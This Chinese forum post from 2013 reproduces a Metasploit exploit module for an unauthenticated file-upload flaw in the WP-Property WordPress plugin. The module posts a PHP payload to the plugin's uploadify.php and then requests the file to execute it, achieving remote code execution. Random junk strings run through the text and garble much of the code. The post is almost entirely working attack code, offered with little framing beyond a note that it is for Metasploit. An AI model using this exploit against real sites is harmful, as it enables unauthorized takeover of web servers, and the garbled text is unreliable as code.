WordPress WP-Property PHP 文件上传漏洞
* K; _. M M9 ?, c/ z: l: r( k0 M/ S7 n/ f
## # This file is part of the Metasploit Framework and may be subject to: |& }+ {% v5 ^6 X! X O
$ y/ y1 I( Y( u! F; x# redistribution and commercial restrictions. Please see the Metasploit
8 [, L Y0 X3 f3 W. F! U% u9 s5 f( z& Z
# Framework web site for more information on licensing and terms of use.& N) T$ s8 r3 E' Y7 H2 T8 N
$ z$ x2 x- R2 W1 u9 s
# http://metasploit.com/framework/ ##
% q: {$ C M; G2 F) q; `& @7 |5 C
# g" s# ^& d9 w8 k9 e; M8 W9 _ ' v* K% A8 G; z# Q
) m! i& P1 d! M" J; E4 d9 h/ u
" K. K* P2 J( ~! L0 p
( ~) w: F" [4 c- Wrequire 'msf/core'
! M+ i% E9 F4 ]6 [9 [ rrequire 'msf/core/exploit/php_exe'$ j; v2 z- m0 j( [4 l( l
' d8 o) Q, k# Q9 [* K1 U
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',2 P$ h i$ ]& H
'Description' => %q{" s& U% Y/ T5 f' G! n
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>6 S# W, n! H& O
[
% E( e# ~$ ?+ T3 A. a9 r9 M'Sammy FORGIT', # initial discovery
) |2 k) H) ]# i4 A) \# ], @4 x a y'James Fitts <fitts.james[at]gmail.com>' # metasploit module" ?! {+ @8 F& n6 G6 x
],
$ C( E* i& M6 E& u4 `# J* V'License' => MSF_LICENSE,, q6 b. f; j5 T8 @- U( x
'References' =>: {& O" u" |: W* J5 }! m1 c
[
7 O- W) m/ @ t[ 'OSVDB', '82656' ]," ^/ Y& q5 n7 q) \6 P
[ 'BID', '53787' ],; Q0 {' Q [# e; c, Q5 ^* L
[ 'EDB', '18987'],7 M3 M( Q, _( W
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
* e8 l9 I8 b6 J% \],5 h) t& F% c, j0 X8 S7 I0 Q
'Payload' =>! L, {4 u5 k6 C$ y
{
3 B$ C% Z! T# Z! o'BadChars' => "\x00",
! z W3 f- Q: B7 i* P},
4 h' Y6 R1 k! h+ `'Platform' => 'php',) W: @) e& `7 A
'Arch' => ARCH_PHP,
; D! @- P, r) o+ g# k: I'Targets' => e0 ]9 L0 W" d' }$ E4 [/ g
[ [' l4 h0 O7 R! A1 n; `7 j6 b
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
' P. C! ~0 h2 y7 u- m8 J[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]8 V# v9 o8 X, u7 v* d
],
" L: K; E- Q8 l J'DefaultTarget' => 0,; W5 x; r; D6 [ ?
'DisclosureDate' => 'Mar 26 2012'))
' v) o: Q! C2 z2 e* W% }, s( ?. I: x$ g+ J
4 i% v# d) E; B1 Gregister_options(. l( a4 Y. D' J
[
7 { K2 ^1 i gOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
! M$ n4 D. S2 F1 U6 l], self.class): \; E% b8 z% J8 h1 i( P8 T" s
end. R/ s# q) \9 v6 Z& E# D/ M
* s: D3 w1 o! k. Jdef check- z' y. J- S* B! q9 X2 O ~0 F
uri = target_uri.path
7 y4 q7 x: ]0 Ouri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
: ?$ o; g5 L T _3 q! \# q6 f8 w'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"/ Y7 U$ W" U$ ?' m! w" [; ~1 j$ U
}) w1 k5 |) y; Q
) y) t6 S" Y, i) C& L" ~1 {: C# _# Rif not res or res.code != 200& h- `' t& r3 }" P
return Exploit::CheckCode::Unknown
/ Q; T+ _; F) X; o, Vend8 ?) V* p' O6 U9 {5 ^! J
$ f+ H5 z8 v5 L0 L$ M) S A3 ]8 U/ treturn Exploit::CheckCode::Appears& O* A9 \$ ^; L8 l; E
end
5 A+ E1 l! s/ R8 h' K1 s
, G/ C1 V! o7 }/ b4 v: _2 wdef exploit
& E/ L, Q# V$ \' f/ I; O+ h3 Yuri = target_uri.path
7 f1 }" F" C2 o$ b7 b/ ]3 Turi << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
& l9 S' h; P8 W6 a# k7 a" t" Z C
( E$ R+ d3 M" s8 b P( m/ [0 Q( q: Sdata = Rex::MIME::Message.new6 `5 b# c8 V$ Z5 f
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
k5 y; v E8 I. pdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
1 j8 c3 y2 ~% V( ^' A9 Cpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')5 Y* u( s3 }! }7 W) J
( f* Z8 t! S. K! Qprint_status("#{peer} - Uploading payload #{@payload_name}")8 z- Y# t# R$ s$ C/ Q- T
res = send_request_cgi({
, e5 |1 d- ^& \& m( I, ~* T3 L+ m! w'method' => 'POST',
8 g+ R6 @5 L+ i'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
4 w/ e( b, m0 b s'ctype' => "multipart/form-data; boundary=#{data.bound}",
/ l! r0 ^3 ~5 b7 X) F9 R& E( u" q! \'data' => post_data
, D0 x# M5 X' q( F4 |+ N& g})
, ^- U8 E: B1 G7 U+ v) }
" M# @5 K) T5 B: X2 z! \( X0 pif not res or res.code != 200 or res.body !~ /#{@payload_name}/
* H# P, }3 s2 @fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"); \4 l! B" G8 w( R7 f
end
& x- g6 c+ [$ A' ~6 \& _5 j/ x* k5 }) o& ^
upload_uri = res.body
! E7 o7 T% q' v: N( j5 q, F4 L% G/ l2 X" V" [& p3 ]
print_status("#{peer} - Executing payload #{@payload_name}")
6 E$ E9 t3 F6 o3 f2 T- Ires = send_request_raw({
, d l0 m* V8 y4 E- Q t' W'uri' => upload_uri,
: T; ]" s* h% W+ ?6 C'method' => 'GET'' g0 b6 L y4 c$ [9 Q# L
})
! @' a8 l l$ ?3 ?6 K0 Kend
5 G" q/ O8 V- y5 q6 D" n4 s. E. L) send
2 c Z9 `8 s8 h3 x5 L5 P |) G2 @
5 V Z8 L m( C不要问我这写的是什么 怎么利用 我是说msf.; m) h, Z: N2 A9 Q# Y9 D
9 X8 S& B! e# C- r6 c
|
发表于 2013-1-4 19:51:30
收藏
支持
反对